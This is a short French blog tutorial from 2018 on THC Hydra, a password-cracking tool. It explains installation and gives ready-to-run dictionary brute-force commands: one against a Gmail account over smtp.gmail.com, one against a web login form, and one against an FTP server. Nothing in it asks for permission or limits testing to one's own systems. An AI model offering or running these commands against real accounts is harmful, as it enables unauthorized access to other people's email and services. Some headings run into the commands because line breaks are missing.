Publié le: 25 Oct, 2018 par Davistar
Qu’est-ce que Hydra ?
THC Hydra est un outil de piratage de mots de passe capable d’exécuter des attaques de dictionnaire très rapides contre plus de cinquante protocoles. C’est un outil de piratage de connexion réseau rapide et stable qui utilise des attaques par dictionnaire ou par force brute pour essayer diverses combinaisons de mots de passe et de connexion sur une page de connexion.
Quelles sont les utilisations typiques de THC Hydra ?
Hydra est utilisé en tant que pirate de connexion parallélisé prenant en charge de nombreux protocoles d’attaque. Les nouveaux modules sont faciles à ajouter. Cet outil montre à quel point il est facile d’obtenir un accès non autorisé à distance.
Installer Hydra
Hydra est très simple d’installation. Sous Parrot et Kali, Hydra est déjà pré-installé.
Sur Linux
$ sudo apt update && apt upgrade -y && apt install hydra -y
# sudo apt install hydra-gtk si vous voulez hydra en GUIComment Utiliser Hydra :
Pour afficher l’aide de Hydra
$ sudo hydra -hCracker un compte smtp avec Hydra via un dictionnaire :
Explication en vidéo ici => https://www.youtube.com/watch?v=3i2fx_kBVwA&t=0s
Notre serveur smtp : smtp.gmail.com Notre port smtp : 465 ou 587
$ sudo hydra -l target@gmail.com -P wordlist.txt -S 465 -v -V -t 1 smtp.gmail.com smtp-l = précise le login -P = précise la wordlist -S = précise le port -v = pour rendre l’attaque verbeuse -t = le nombre de threads smtp = le protocole de l’attaque
Cracker un compte via une page login post form :
$ hydra <IP> https-post-form "/login/login.php:user=admin&password=^PASS^ :F=failed" -l admin -P wordlist.txt -t 1 -VCracker un compte FTP via Hydra
$ hydra -l admin -P passlist.txt ftp://192.168.1.70
